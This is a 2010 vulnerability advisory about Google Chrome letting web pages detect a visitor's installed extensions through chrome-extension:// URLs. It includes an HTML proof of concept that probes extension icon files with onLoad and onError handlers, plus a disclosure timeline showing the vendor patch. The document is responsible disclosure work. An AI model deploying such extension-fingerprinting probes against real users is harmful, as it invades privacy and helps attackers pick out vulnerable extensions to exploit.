Google Chrome Arbitrary Extensions Detection

`######################################################  
Google Chrome Instaled extensions arbitrary detection  
Vendor url: http://www.google.com  
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html  
Vendor notify:YES vendor confirmed.YES exploit:YES  
######################################################  
  
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html  
  
#########  
Abstract  
#########  
  
How safe is use extensions ?  
a attacker can access via iframe to resource extensions ( at this moment i  
don´t have found a way to altered information from extensions).  
  
like  
>iframe  
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<  
for example...  
  
a remote user can modify this web doc and call it with meta tag "base"  
in a malformed doc...  
  
<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">  
so i thnik that chrome-extension need sanitizacion to don´t access internal  
resources from external web pages..( file:/// and other protocols handlers  
are safe to use and don´t give access to internal resources from external  
web docs...)  
  
So chrome-extension protocol handler can be used to get extensions instaled  
on client browser...and them if any extension is vulnerable to something  
this information can be used for exploit this extension...  
  
In incognito mode Extensions can be detectable too  
  
###########################  
A sample PoC of detection  
###########################  
  
<html>  
<head>  
<title>Chrome extensions detector PoC By Lostmon</title>  
<body>  
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"  
onLoad="document.write('<br /><b>you have instaled Gmail checker  
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>  
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"  
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"  
onError="document.write('<br /><b>File not found</b>');"></p>  
<p><img  
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"  
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"  
onError="document.write('<br /><b>File not found</b>');"></p>  
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"  
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"  
onError="document.write('<br /><b>File not found</b>');"></p>  
<p><img  
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"  
onLoad="document.write('<br /><b>you have instaled Webpage  
Screenshot</b>');" onError="document.write('<br /><b>File not  
found</b>');"></p>  
<p><img  
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"  
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"  
onError="document.write('<br /><b>File not found</b>');"></p>  
<p><img  
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"  
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"  
onError="document.write('<br /><b>File not found</b>');"></p>  
</body>  
</html>  
  
####################EOF##########################  
  
##############  
Timeline  
##############  
  
Discovered:27 may 2010  
Vendor notify:01 jun 2010  
Vendor patch:02 sep 2010  
disclosure: 07 sep 2010  
  
#######################€ND ########################  
  
Thnx To Climbo for his patience and support.  
  
Atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`